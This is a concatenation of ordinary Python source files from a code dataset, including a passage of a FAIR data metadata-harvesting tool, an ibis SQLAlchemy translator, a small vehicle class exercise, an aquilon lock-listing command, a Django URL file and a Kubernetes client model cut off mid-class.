# retrieve metadata standards info from oai-pmh
if self.oaipmh_endpoint:
self.logger.info('{} : Use OAI-PMH endpoint to retrieve standards used by the repository - {}'.format('FsF-R1.3-01M',self.oaipmh_endpoint))
if (self.uri_validator(self.oaipmh_endpoint)):
oai_provider = OAIMetadataProvider(endpoint=self.oaipmh_endpoint, logger=self.logger,metric_id='FsF-R1.3-01M')
self.community_standards_uri = oai_provider.getMetadataStandards()
self.namespace_uri.extend(oai_provider.getNamespaces())
stds = None
if self.community_standards_uri:
stds = list(self.community_standards_uri.keys())
self.logger.log(self.LOG_SUCCESS,'{} : Found disciplinary standards that are listed in OAI-PMH endpoint - {}'.format('FsF-R1.3-01M',stds ))
else:
self.logger.info('{} : Invalid endpoint'.format('FsF-R1.3-01M'))
else:
self.logger.warning('{} : NO OAI-PMH endpoint found'.format('FsF-R1.3-01M'))
else:
self.logger.warning('{} : Skipped external resources (OAI, re3data) checks since landing page could not be resolved'.format('FsF-R1.3-01M'))
def retrieve_metadata_embedded(self, extruct_metadata):
isPid = False
if self.pid_scheme:
isPid = True
# ========= retrieve embedded rdfa and microdata metadata ========
micro_meta = extruct_metadata.get('microdata')
microdata_collector = MetaDataCollectorMicroData(loggerinst=self.logger, sourcemetadata=micro_meta,
mapping=Mapper.MICRODATA_MAPPING)
source_micro, micro_dict = microdata_collector.parse_metadata()
if micro_dict:
self.metadata_sources.append((source_micro,'embedded'))
self.namespace_uri.extend(microdata_collector.getNamespaces())
micro_dict = self.exclude_null(micro_dict)
for i in micro_dict.keys():
if i in self.reference_elements:
self.metadata_merged[i] = micro_dict[i]
self.reference_elements.remove(i)
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found microdata metadata: '+str(micro_dict.keys()))
#================== RDFa
RDFA_ns = rdflib.Namespace("http://www.w3.org/ns/rdfa#")
rdfasource = MetaDataCollector.Sources.RDFA.value
rdfagraph = None
errors=[]
try:
rdfagraph = rdflib.Graph()
rdfagraph.parse(data=self.landing_html, format='rdfa')
rdfa_collector = MetaDataCollectorRdf(loggerinst=self.logger, target_url=self.landing_url, source=rdfasource,
rdf_graph=rdfagraph)
source_rdfa, rdfa_dict = rdfa_collector.parse_metadata()
self.metadata_sources.append((rdfasource,'embedded'))
self.namespace_uri.extend(rdfa_collector.getNamespaces())
#rdfa_dict['object_identifier']=self.pid_url
rdfa_dict = self.exclude_null(rdfa_dict)
for i in rdfa_dict.keys():
if i in self.reference_elements:
self.metadata_merged[i] = rdfa_dict[i]
self.reference_elements.remove(i)
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found RDFa metadata: '+str(rdfa_dict.keys()))
except:
self.logger.info('FsF-F2-01M : RDFa metadata parsing exception, probably no RDFa embedded in HTML')
# ========= retrieve schema.org (embedded, or from via content-negotiation if pid provided) =========
ext_meta = extruct_metadata.get('json-ld')
if self.use_datacite is True:
target_url = self.pid_url
else:
target_url = self.landing_url
schemaorg_collector = MetaDataCollectorSchemaOrg(loggerinst=self.logger, sourcemetadata=ext_meta,
mapping=Mapper.SCHEMAORG_MAPPING, pidurl=target_url)
source_schemaorg, schemaorg_dict = schemaorg_collector.parse_metadata()
schemaorg_dict = self.exclude_null(schemaorg_dict)
if schemaorg_dict:
self.namespace_uri.extend(schemaorg_collector.namespaces)
#not_null_sco = [k for k, v in schemaorg_dict.items() if v is not None]
if source_schemaorg == MetaDataCollector.Sources.SCHEMAORG_EMBED.value:
self.metadata_sources.append((source_schemaorg,'embedded'))
else:
self.metadata_sources.append((source_schemaorg, 'negotiated'))
if schemaorg_dict.get('related_resources'):
self.related_resources.extend(schemaorg_dict.get('related_resources'))
if schemaorg_dict.get('object_content_identifier'):
self.logger.info('FsF-F3-01M : Found data links in Schema.org metadata : ' + str(schemaorg_dict.get('object_content_identifier')))
# add object type for future reference
for i in schemaorg_dict.keys():
if i in self.reference_elements:
self.metadata_merged[i] = schemaorg_dict[i]
self.reference_elements.remove(i)
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found Schema.org metadata: '+str(schemaorg_dict.keys()))
else:
self.logger.info('FsF-F2-01M : Schema.org metadata UNAVAILABLE')
# ========= retrieve dublin core embedded in html page =========
if self.reference_elements:
self.logger.info('FsF-F2-01M : Checking for DublinCore metadata')
dc_collector = MetaDataCollectorDublinCore(loggerinst=self.logger, sourcemetadata=self.landing_html,
mapping=Mapper.DC_MAPPING)
source_dc, dc_dict = dc_collector.parse_metadata()
dc_dict = self.exclude_null(dc_dict)
if dc_dict:
self.namespace_uri.extend(dc_collector.namespaces)
#not_null_dc = [k for k, v in dc_dict.items() if v is not None]
self.metadata_sources.append((source_dc,'embedded'))
if dc_dict.get('related_resources'):
self.related_resources.extend(dc_dict.get('related_resources'))
for d in dc_dict.keys():
if d in self.reference_elements:
self.metadata_merged[d] = dc_dict[d]
self.reference_elements.remove(d)
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found DublinCore metadata: '+str(dc_dict.keys()))
else:
self.logger.info('FsF-F2-01M : DublinCore metadata UNAVAILABLE')
# ======== retrieve OpenGraph metadata
ext_meta = extruct_metadata.get('opengraph')
opengraph_collector = MetaDataCollectorOpenGraph(loggerinst=self.logger, sourcemetadata=ext_meta,
mapping=Mapper.OG_MAPPING)
source_opengraph, opengraph_dict = opengraph_collector.parse_metadata()
opengraph_dict = self.exclude_null(opengraph_dict)
if opengraph_dict:
self.namespace_uri.extend(opengraph_collector.namespaces)
self.metadata_sources.append((source_opengraph,'embedded'))
for i in opengraph_dict.keys():
if i in self.reference_elements:
self.metadata_merged[i] = opengraph_dict[i]
self.reference_elements.remove(i)
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found OpenGraph metadata: ' + str(opengraph_dict.keys()))
else:
self.logger.info('FsF-F2-01M : OpenGraph metadata UNAVAILABLE')
#========= retrieve signposting data links
data_sign_links = self.get_signposting_links('item')
if data_sign_links:
self.logger.info('FsF-F3-01M : Found data links in response header (signposting) : ' + str(len(data_sign_links)))
if self.metadata_merged.get('object_content_identifier') is None:
self.metadata_merged['object_content_identifier'] = data_sign_links
#========= retrieve typed data object links =========
data_meta_links = self.get_html_typed_links(rel='item')
if data_meta_links:
self.logger.info('FsF-F3-01M : Found data links in HTML head (link rel=item) : ' + str(len(data_meta_links)))
if self.metadata_merged.get('object_content_identifier') is None:
self.metadata_merged['object_content_identifier'] = data_meta_links
# self.metadata_sources.append((MetaDataCollector.Sources.TYPED_LINK.value,'linked'))
#Now if an identifier has been detected in the metadata, potentially check for persistent identifier has to be repeated..
if self.metadata_merged.get('object_identifier'):
if isinstance(self.metadata_merged.get('object_identifier'),list):
identifiertotest = self.metadata_merged.get('object_identifier')[0]
else:
identifiertotest = self.metadata_merged.get('object_identifier')
if self.pid_scheme is None:
#print(self.metadata_merged.get('object_identifier'))
found_pids_in_metadata = idutils.detect_identifier_schemes(identifiertotest)
if len(found_pids_in_metadata) > 1:
if 'url' in found_pids_in_metadata:
found_pids_in_metadata.remove('url')
found_id = found_pids_in_metadata[0]
if found_id in Mapper.VALID_PIDS.value:
self.logger.info('FsF-F2-01M : Found object identifier in metadata, repeating PID check for FsF-F1-02D')
self.logger.log(self.LOG_SUCCESS, 'FsF-F1-02D : Found object identifier in metadata during FsF-F2-01M, PID check was repeated')
self.repeat_pid_check = True
self.pid_scheme = found_id
self.id = identifiertotest
# Comment: not sure if we really need a separate class as proposed below. Instead we can use a dictionary
# TODO (important) separate class to represent https://www.iana.org/assignments/link-relations/link-relations.xhtml
# use IANA relations for extracting metadata and meaningful links
def get_html_typed_links(self, rel="item"):
# Use Typed Links in HTTP Link headers to help machines find the resources that make up a publication.
# Use links to find domains specific metadata
datalinks = []
if isinstance(self.landing_html, str):
dom = lxml.html.fromstring(self.landing_html.encode('utf8'))
links=dom.xpath('/*/head/link[@rel="'+rel+'"]')
for l in links:
href=l.attrib.get('href')
#handle relative paths
if href.startswith('/'):
href=self.landing_origin+href
datalinks.append({'url': href, 'type': l.attrib.get('type'), 'rel': l.attrib.get('rel'), 'profile': l.attrib.get('format')})
return datalinks
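# Example of what the XPath above would match (hypothetical markup, not from the source):
# <link rel="item" type="text/csv" href="/data/table.csv"> on a landing page whose
# origin is https://example.org yields
# {'url': 'https://example.org/data/table.csv', 'type': 'text/csv', 'rel': 'item', 'profile': None}.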
def get_signposting_links(self, rel="item"):
signlinks =[]
for signposting_links in self.signposting_header_links:
if signposting_links.get('rel') == rel:
signlinks.append(signposting_links)
return signlinks
def get_guessed_xml_link(self):
# in case object landing page URL ends with '.html' or '/html'
# try to find out if there is some xml content if the suffix is replaced by 'xml'
datalink = None
if self.landing_url is not None:
suff_res = re.search(r".*[\.\/](html?)?$", self.landing_url)
if suff_res is not None:
if suff_res[1] is not None:
guessed_link = self.landing_url.replace(suff_res[1],'xml')
try:
response = urllib.request.urlopen(guessed_link)  # urlopen lives in urllib.request on Python 3
if response.getheader('Content-Type') in ['text/xml','application/rdf+xml']:
datalink={'source':'guessed','url': guessed_link, 'type': response.getheader('Content-Type'), 'rel': 'alternate'}
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found XML content at: '+guessed_link)
except:
self.logger.info('FsF-F2-01M : Guessed XML retrieval failed for: '+guessed_link)
return datalink
def retrieve_metadata_external(self):
test_content_negotiation = False
test_typed_links = False
test_signposting = False
test_embedded = False
# ========= retrieve xml metadata namespaces by content negotiation ========
if self.landing_url is not None:
self.logger.info('FsF-F2-01M : Trying to retrieve XML metadata through content negotiation')
negotiated_xml_collector = MetaDataCollectorXML(loggerinst=self.logger,target_url=self.landing_url, link_type='negotiated')
source_neg_xml, metadata_neg_dict = negotiated_xml_collector.parse_metadata()
metadata_neg_dict = self.exclude_null(metadata_neg_dict)
if metadata_neg_dict:
test_content_negotiation = True
#TODO: Finish this ...
# ========= retrieve rdf metadata namespaces by content negotiation ========
self.logger.info('FsF-F2-01M : Trying to retrieve RDF metadata through content negotiation')
source = MetaDataCollector.Sources.LINKED_DATA.value
if self.pid_scheme == 'purl':
targeturl = self.pid_url
else:
targeturl = self.landing_url
neg_rdf_collector = MetaDataCollectorRdf(loggerinst=self.logger, target_url=targeturl,
source=source)
if neg_rdf_collector is not None:
source_rdf, rdf_dict = neg_rdf_collector.parse_metadata()
# in case F-UJI was redirected and the landing page content negotiation doesn't return anything, try the origin URL
if not rdf_dict:
if self.origin_url is not None:
neg_rdf_collector.target_url = self.origin_url
source_rdf, rdf_dict = neg_rdf_collector.parse_metadata()
self.namespace_uri.extend(neg_rdf_collector.getNamespaces())
rdf_dict = self.exclude_null(rdf_dict)
if rdf_dict:
if rdf_dict.get('object_content_identifier'):
self.logger.info('FsF-F3-01M : Found data links in RDF metadata : ' + str(
len(rdf_dict.get('object_content_identifier'))))
test_content_negotiation = True
self.logger.log(self.LOG_SUCCESS,
'FsF-F2-01M : Found Linked Data metadata: {}'.format(str(rdf_dict.keys())))
self.metadata_sources.append((source_rdf,'negotiated'))
for r in rdf_dict.keys():
if r in self.reference_elements:
self.metadata_merged[r] = rdf_dict[r]
self.reference_elements.remove(r)
else:
self.logger.info('FsF-F2-01M : Linked Data metadata UNAVAILABLE')
# ========= retrieve datacite json metadata based on pid =========
if self.pid_scheme:
# ================= datacite by content negotiation ===========
# in case use_datacite id false use the landing page URL for content negotiation, otherwise the pid url
if self.use_datacite is True:
datacite_target_url = self.pid_url
else:
datacite_target_url = self.landing_url
dcite_collector = MetaDataCollectorDatacite(mapping=Mapper.DATACITE_JSON_MAPPING, loggerinst=self.logger,
pid_url=datacite_target_url)
source_dcitejsn, dcitejsn_dict = dcite_collector.parse_metadata()
dcitejsn_dict = self.exclude_null(dcitejsn_dict)
if dcitejsn_dict:
test_content_negotiation = True
# not_null_dcite = [k for k, v in dcitejsn_dict.items() if v is not None]
self.metadata_sources.append((source_dcitejsn,'negotiated'))
self.logger.log(self.LOG_SUCCESS,'FsF-F2-01M : Found Datacite metadata: {}'.format(str(dcitejsn_dict.keys())))
if dcitejsn_dict.get('object_content_identifier'):
self.logger.info('FsF-F3-01M : Found data links in Datacite metadata : ' + str(
dcitejsn_dict.get('object_content_identifier')))
if dcitejsn_dict.get('related_resources'):
self.related_resources.extend(dcitejsn_dict.get('related_resources'))
for r in dcitejsn_dict.keys():
# only merge when the value cannot be retrieved from embedded metadata
if r in self.reference_elements and not self.metadata_merged.get(r):
self.metadata_merged[r] = dcitejsn_dict[r]
self.reference_elements.remove(r)
else:
self.logger.info('FsF-F2-01M : Datacite metadata UNAVAILABLE')
else:
self.logger.info('FsF-F2-01M : Not a PID, therefore Datacite metadata (json) not requested.')
sign_header_links = []
#signposting header links
if self.get_signposting_links('describedby'):
sign_header_links = self.get_signposting_links('describedby')
self.metadata_sources.append((MetaDataCollector.Sources.SIGN_POSTING.value, 'signposting'))
#dcat style meta links
typed_metadata_links = self.get_html_typed_links(rel='alternate')
#ddi style meta links
rel_meta_links = self.get_html_typed_links(rel='meta')
#signposting style meta links
sign_meta_links = self.get_html_typed_links(rel='describedby')
typed_metadata_links.extend(sign_meta_links)
typed_metadata_links.extend(rel_meta_links)
typed_metadata_links.extend(sign_header_links)
guessed_metadata_link = self.get_guessed_xml_link()
if guessed_metadata_link is not None:
typed_metadata_links.append(guessed_metadata_link)
if typed_metadata_links is not None:
typed_rdf_collector = None
for metadata_link in typed_metadata_links:
if metadata_link['type'] in ['application/rdf+xml','text/n3','text/ttl','application/ld+json']:
self.logger.info('FsF-F2-01M : Found typed links in HTML header linking to RDF metadata (' + str(metadata_link['type']) + ')')
found_metadata_link=True
source = MetaDataCollector.Sources.RDF_TYPED_LINKS.value
typed_rdf_collector = MetaDataCollectorRdf(loggerinst=self.logger, target_url=metadata_link['url'], source=source )
elif metadata_link['type'] in ['text/xml','application/x-ddi-l+xml','application/x-ddametadata+xml']:
self.logger.info('FsF-F2-01M : Found typed links in HTML header linking to XML metadata (' + str(metadata_link['type']) + ')')
typed_rdf_collector = MetaDataCollectorXML(loggerinst=self.logger,
target_url=metadata_link['url'], link_type=metadata_link.get('source'))
if typed_rdf_collector is not None:
source_rdf, rdf_dict = typed_rdf_collector.parse_metadata()
self.namespace_uri.extend(typed_rdf_collector.getNamespaces())
rdf_dict = self.exclude_null(rdf_dict)
if rdf_dict:
test_typed_links = True
self.logger.log(self.LOG_SUCCESS,'FsF-F2-01M : Found Linked Data metadata: {}'.format(str(rdf_dict.keys())))
self.metadata_sources.append((source_rdf,'linked'))
for r in rdf_dict.keys():
if r in self.reference_elements:
self.metadata_merged[r] = rdf_dict[r]
self.reference_elements.remove(r)
else:
self.logger.info('FsF-F2-01M : Linked Data metadata UNAVAILABLE')
if self.reference_elements:
self.logger.debug('Reference metadata elements NOT FOUND - {}'.format(self.reference_elements))
else:
self.logger.debug('FsF-F2-01M : ALL reference metadata elements available')
def exclude_null(self, dt):
if type(dt) is dict:
return dict((k, self.exclude_null(v)) for k, v in dt.items() if v and self.exclude_null(v))
elif type(dt) is list:
return [self.exclude_null(v) for v in dt if v and self.exclude_null(v)]
else:
return dt
def lookup_metadatastandard_by_name(self, value):
found = None
# get standard name with the highest matching percentage using fuzzywuzzy
highest = process.extractOne(value, FAIRCheck.COMMUNITY_STANDARDS_NAMES, scorer=fuzz.token_sort_ratio)
if highest[1] > 80:
found = highest[0]
return found
def lookup_metadatastandard_by_uri(self, value):
found = None
# get standard uri with the highest matching percentage using fuzzywuzzy
highest = process.extractOne(value, FAIRCheck.COMMUNITY_METADATA_STANDARDS_URIS_LIST,
scorer=fuzz.token_sort_ratio)
if highest[1] > 90:
found = highest[0]
return found
def check_unique_identifier(self):
unique_identifier_check = FAIREvaluatorUniqueIdentifier(self)
unique_identifier_check.set_metric('FsF-F1-01D', metrics=FAIRCheck.METRICS)
return unique_identifier_check.getResult()
def check_persistent_identifier(self):
persistent_identifier_check = FAIREvaluatorPersistentIdentifier(self)
persistent_identifier_check.set_metric('FsF-F1-02D', metrics=FAIRCheck.METRICS)
return persistent_identifier_check.getResult()
def check_unique_persistent(self):
return self.check_unique_identifier(), self.check_persistent_identifier()
def check_minimal_metatadata(self):
core_metadata_check = FAIREvaluatorCoreMetadata(self)
core_metadata_check.set_metric('FsF-F2-01M', metrics=FAIRCheck.METRICS)
return core_metadata_check.getResult()
def check_content_identifier_included(self):
content_included_check = FAIREvaluatorContentIncluded(self)
content_included_check.set_metric('FsF-F3-01M', metrics=FAIRCheck.METRICS)
return content_included_check.getResult()
def check_data_access_level(self):
data_access_level_check = FAIREvaluatorDataAccessLevel(self)
data_access_level_check.set_metric('FsF-A1-01M', metrics=FAIRCheck.METRICS)
return data_access_level_check.getResult()
def check_license(self):
license_check = FAIREvaluatorLicense(self)
license_check.set_metric('FsF-R1.1-01M', metrics=FAIRCheck.METRICS)
return license_check.getResult()
def check_relatedresources(self):
related_check = FAIREvaluatorRelatedResources(self)
related_check.set_metric('FsF-I3-01M', metrics=FAIRCheck.METRICS)
return related_check.getResult()
def check_searchable(self):
searchable_check = FAIREvaluatorSearchable(self)
searchable_check.set_metric('FsF-F4-01M', metrics=FAIRCheck.METRICS)
return searchable_check.getResult()
def check_data_file_format(self):
data_file_check = FAIREvaluatorFileFormat(self)
data_file_check.set_metric('FsF-R1.3-02D', metrics=FAIRCheck.METRICS)
return data_file_check.getResult()
def check_community_metadatastandards(self):
community_metadata_check = FAIREvaluatorCommunityMetadata(self)
community_metadata_check.set_metric('FsF-R1.3-01M', metrics=FAIRCheck.METRICS)
return community_metadata_check.getResult()
def check_data_provenance(self):
data_prov_check = FAIREvaluatorDataProvenance(self)
data_prov_check.set_metric('FsF-R1.2-01M', metrics=FAIRCheck.METRICS)
return data_prov_check.getResult()
def check_data_content_metadata(self):
data_content_metadata_check = FAIREvaluatorDataContentMetadata(self)
data_content_metadata_check.set_metric('FsF-R1-01MD', metrics=FAIRCheck.METRICS)
return data_content_metadata_check.getResult()
def check_formal_metadata(self):
formal_metadata_check = FAIREvaluatorFormalMetadata(self)
formal_metadata_check.set_metric('FsF-I1-01M', metrics=FAIRCheck.METRICS)
return formal_metadata_check.getResult()
def check_semantic_vocabulary(self):
semantic_vocabulary_check = FAIREvaluatorSemanticVocabulary(self)
semantic_vocabulary_check.set_metric('FsF-I1-02M', metrics=FAIRCheck.METRICS)
return semantic_vocabulary_check.getResult()
def check_metadata_preservation(self):
metadata_preserved_check = FAIREvaluatorMetadataPreserved(self)
metadata_preserved_check.set_metric('FsF-A2-01M', metrics=FAIRCheck.METRICS)
return metadata_preserved_check.getResult()
def check_standardised_protocol_data(self):
standardised_protocol_check = FAIREvaluatorStandardisedProtocolData(self)
standardised_protocol_check.set_metric('FsF-A1-03D', metrics=FAIRCheck.METRICS)
return standardised_protocol_check.getResult()
def check_standardised_protocol_metadata(self):
standardised_protocol_metadata_check = FAIREvaluatorStandardisedProtocolMetadata(self)
standardised_protocol_metadata_check.set_metric('FsF-A1-02M', metrics=FAIRCheck.METRICS)
return standardised_protocol_metadata_check.getResult()
def get_log_messages_dict(self):
logger_messages ={}
self.logger_message_stream.seek(0)
for log_message in self.logger_message_stream.readlines():
if log_message.startswith('FsF-'):
m = log_message.split(":", 1)
metric = m[0].strip()
message_n_level = m[1].strip().split("|",1)
level = message_n_level[1]
message = message_n_level[0]
if metric not in logger_messages:
logger_messages[metric] =[]
if message not in logger_messages[metric]:
logger_messages[metric].append(level.replace('\n', '')+': '+message.strip())
return logger_messages
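# Sketch of the stream format parsed above (added note): the debug handler's formatter
# '%(message)s|%(levelname)s' writes lines such as
# 'FsF-F2-01M : Found DublinCore metadata|SUCCESS', which the loop turns into
# {'FsF-F2-01M': ['SUCCESS: Found DublinCore metadata']}.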
| 54.382514
| 159
| 0.665293
|
ba89c76b9ab60463cfdd24a54b619b97f7995b30
| 2,779
|
py
|
Python
|
ibis/backends/base/sql/alchemy/translator.py
|
harsharaj96/ibis
|
ab3de68eb6596eca5cc7cba8c3fdb583f6143a4e
|
[
"Apache-2.0"
] | null | null | null |
ibis/backends/base/sql/alchemy/translator.py
|
harsharaj96/ibis
|
ab3de68eb6596eca5cc7cba8c3fdb583f6143a4e
|
[
"Apache-2.0"
] | null | null | null |
ibis/backends/base/sql/alchemy/translator.py
|
harsharaj96/ibis
|
ab3de68eb6596eca5cc7cba8c3fdb583f6143a4e
|
[
"Apache-2.0"
] | 1
|
2017-11-30T13:32:23.000Z
|
2017-11-30T13:32:23.000Z
|
import ibis
import ibis.expr.operations as ops
import ibis.expr.types as ir
from ibis import util
from ibis.backends.base.sql.compiler import ExprTranslator, QueryContext
from .datatypes import ibis_type_to_sqla, to_sqla_type
from .query_builder import to_sqlalchemy
from .registry import fixed_arity, sqlalchemy_operation_registry
class AlchemyContext(QueryContext):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._table_objects = {}
def collapse(self, queries):
if isinstance(queries, str):
return queries
if len(queries) > 1:
raise NotImplementedError(
'Only a single query is supported for SQLAlchemy backends'
)
return queries[0]
def subcontext(self):
return type(self)(
dialect=self.dialect, parent=self, params=self.params
)
def _to_sql(self, expr, ctx):
return to_sqlalchemy(expr, ctx)
def _compile_subquery(self, expr):
sub_ctx = self.subcontext()
return self._to_sql(expr, sub_ctx)
def has_table(self, expr, parent_contexts=False):
key = self._get_table_key(expr)
return self._key_in(
key, '_table_objects', parent_contexts=parent_contexts
)
def set_table(self, expr, obj):
key = self._get_table_key(expr)
self._table_objects[key] = obj
def get_table(self, expr):
"""
Get the memoized SQLAlchemy expression object
"""
return self._get_table_item('_table_objects', expr)
class AlchemyExprTranslator(ExprTranslator):
_registry = sqlalchemy_operation_registry
_rewrites = ExprTranslator._rewrites.copy()
_type_map = ibis_type_to_sqla
context_class = AlchemyContext
def name(self, translated, name, force=True):
if hasattr(translated, 'label'):
return translated.label(name)
return translated
def get_sqla_type(self, data_type):
return to_sqla_type(data_type, type_map=self._type_map)
rewrites = AlchemyExprTranslator.rewrites
@rewrites(ops.NullIfZero)
def _nullifzero(expr):
arg = expr.op().args[0]
return (arg == 0).ifelse(ibis.NA, arg)
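# The rewrite above expresses NullIfZero(arg) as an ibis conditional, i.e. the SQL
# equivalent of NULLIF(arg, 0): CASE WHEN arg = 0 THEN NULL ELSE arg END.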
# TODO This was previously implemented with the legacy `@compiles` decorator.
# This definition should now be in the registry, but there is some magic going
# on such that things fail if it is not defined here (in the registry,
# `operator.truediv` is used).
def _true_divide(t, expr):
op = expr.op()
left, right = args = op.args
if util.all_of(args, ir.IntegerValue):
return t.translate(left.div(right.cast('double')))
return fixed_arity(lambda x, y: x / y, 2)(t, expr)
AlchemyExprTranslator._registry[ops.Divide] = _true_divide
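# Effect of the registration above (added note): for two integer operands the divide
# is rewritten as left.div(right.cast('double')), so e.g. 1 / 2 compiles to true
# division (0.5) rather than the backend's integer division.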
| 28.649485
| 78
| 0.68154
|
e16c3b49d8607d317962611838154deae984da20
| 482
|
py
|
Python
|
make-your-own-text-adventure-with-python/homework/automobile.py
|
learning-game-development/learning-python-game-development
|
326b72eadab0bfb14f70f295b492f76d139dde33
|
[
"Unlicense"
] | null | null | null |
make-your-own-text-adventure-with-python/homework/automobile.py
|
learning-game-development/learning-python-game-development
|
326b72eadab0bfb14f70f295b492f76d139dde33
|
[
"Unlicense"
] | null | null | null |
make-your-own-text-adventure-with-python/homework/automobile.py
|
learning-game-development/learning-python-game-development
|
326b72eadab0bfb14f70f295b492f76d139dde33
|
[
"Unlicense"
] | null | null | null |
class Vehicle:
def __init__(self):
raise NotImplementedError("Do not create raw Vehicle objects.")
def __str__(self):
return "{} has {} wheels".format(self.name, self.wheels)
class Motorcycle(Vehicle):
def __init__(self, name):
self.name = name
self.wheels = 2
class Car(Vehicle):
def __init__(self, name):
self.name = name
self.wheels = 4
print(Motorcycle('Yamaha'))
print(Car('Ford Mustang'))
print(Vehicle())
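# Note (added): the last call raises NotImplementedError on purpose, since Vehicle's
# __init__ forbids instantiating the base class directly.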
| 20.956522
| 71
| 0.63278
|
9dcc1021bb7510e147001bb10d64287fcb163850
| 1,504
|
py
|
Python
|
lib/aquilon/worker/commands/show_active_locks.py
|
ned21/aquilon
|
6562ea0f224cda33b72a6f7664f48d65f96bd41a
|
[
"Apache-2.0"
] | 7
|
2015-07-31T05:57:30.000Z
|
2021-09-07T15:18:56.000Z
|
lib/aquilon/worker/commands/show_active_locks.py
|
ned21/aquilon
|
6562ea0f224cda33b72a6f7664f48d65f96bd41a
|
[
"Apache-2.0"
] | 115
|
2015-03-03T13:11:46.000Z
|
2021-09-20T12:42:24.000Z
|
lib/aquilon/worker/commands/show_active_locks.py
|
ned21/aquilon
|
6562ea0f224cda33b72a6f7664f48d65f96bd41a
|
[
"Apache-2.0"
] | 13
|
2015-03-03T11:17:59.000Z
|
2021-09-09T09:16:41.000Z
|
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2015,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq show active locks`."""
from aquilon.worker.broker import BrokerCommand
from aquilon.worker.locks import lock_queue
class CommandShowActiveLocks(BrokerCommand):
requires_transaction = False
defer_to_thread = False
# Even though this class imports lock_queue, it doesn't take any locks!
_is_lock_free = True
def render(self, **_):
retval = []
for key in lock_queue.queue[:]:
description = "Defunct lock: "
if hasattr(key.logger, "get_status"):
status = key.logger.get_status()
if status and status.description:
description = status.description + ' '
retval.append("%s%s %s" % (description, key.state, key))
return retval
| 37.6
| 75
| 0.688165
|
dadafddbc6bf0eb3cdcc944880c03fb5f7107dde
| 92
|
py
|
Python
|
tests/modules/withenum.py
|
jjerphan/py2puml
|
b39dee92609440afea1301fe68c17f6cff5fa04f
|
[
"MIT"
] | null | null | null |
tests/modules/withenum.py
|
jjerphan/py2puml
|
b39dee92609440afea1301fe68c17f6cff5fa04f
|
[
"MIT"
] | null | null | null |
tests/modules/withenum.py
|
jjerphan/py2puml
|
b39dee92609440afea1301fe68c17f6cff5fa04f
|
[
"MIT"
] | null | null | null |
from enum import Enum
class TimeUnit(Enum):
DAYS = 'd'
HOURS = 'h'
MINUTE = 'm'
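# Illustrative usage (added note): members map to their short codes, e.g.
# TimeUnit.DAYS.value == 'd', and lookup by value works too: TimeUnit('h') is TimeUnit.HOURS.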
| 15.333333
| 21
| 0.576087
|
a7df81b887e5acb5f25243723afff2b5af7b93ed
| 124
|
py
|
Python
|
django_manager/urls.py
|
gitliuhao/django_manager
|
8eedbccff525ba187ac08561b3116b59174dbd5b
|
[
"MIT"
] | 2
|
2018-05-03T02:25:14.000Z
|
2018-05-06T11:05:03.000Z
|
django_manager/urls.py
|
gitliuhao/django_manager
|
8eedbccff525ba187ac08561b3116b59174dbd5b
|
[
"MIT"
] | null | null | null |
django_manager/urls.py
|
gitliuhao/django_manager
|
8eedbccff525ba187ac08561b3116b59174dbd5b
|
[
"MIT"
] | null | null | null |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'upload$', views.upload, name='upload'),
]
| 24.8
| 50
| 0.677419
|
62b1cdb6275604233260f915ee0581e91bce7bcf
| 4,896
|
py
|
Python
|
kubernetes_asyncio/client/models/core_v1_event_series.py
|
tomplus/kubernetes-asyncio
|
11c3eb4d50ae822545572aa7b8c15f7153f65a1c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/core_v1_event_series.py
|
tomplus/kubernetes-asyncio
|
11c3eb4d50ae822545572aa7b8c15f7153f65a1c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/core_v1_event_series.py
|
tomplus/kubernetes-asyncio
|
11c3eb4d50ae822545572aa7b8c15f7153f65a1c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.23.6
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from kubernetes_asyncio.client.configuration import Configuration
class CoreV1EventSeries(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'count': 'int',
'last_observed_time': 'datetime'
}
attribute_map = {
'count': 'count',
'last_observed_time': 'lastObservedTime'
}
def __init__(self, count=None, last_observed_time=None, local_vars_configuration=None): # noqa: E501
"""CoreV1EventSeries - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._count = None
self._last_observed_time = None
self.discriminator = None
if count is not None:
self.count = count
if last_observed_time is not None:
self.last_observed_time = last_observed_time
@property
def count(self):
"""Gets the count of this CoreV1EventSeries. # noqa: E501
Number of occurrences in this series up to the last heartbeat time # noqa: E501
:return: The count of this CoreV1EventSeries. # noqa: E501
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
"""Sets the count of this CoreV1EventSeries.
Number of occurrences in this series up to the last heartbeat time # noqa: E501
:param count: The count of this CoreV1EventSeries. # noqa: E501
:type count: int
"""
self._count = count
@property
def last_observed_time(self):
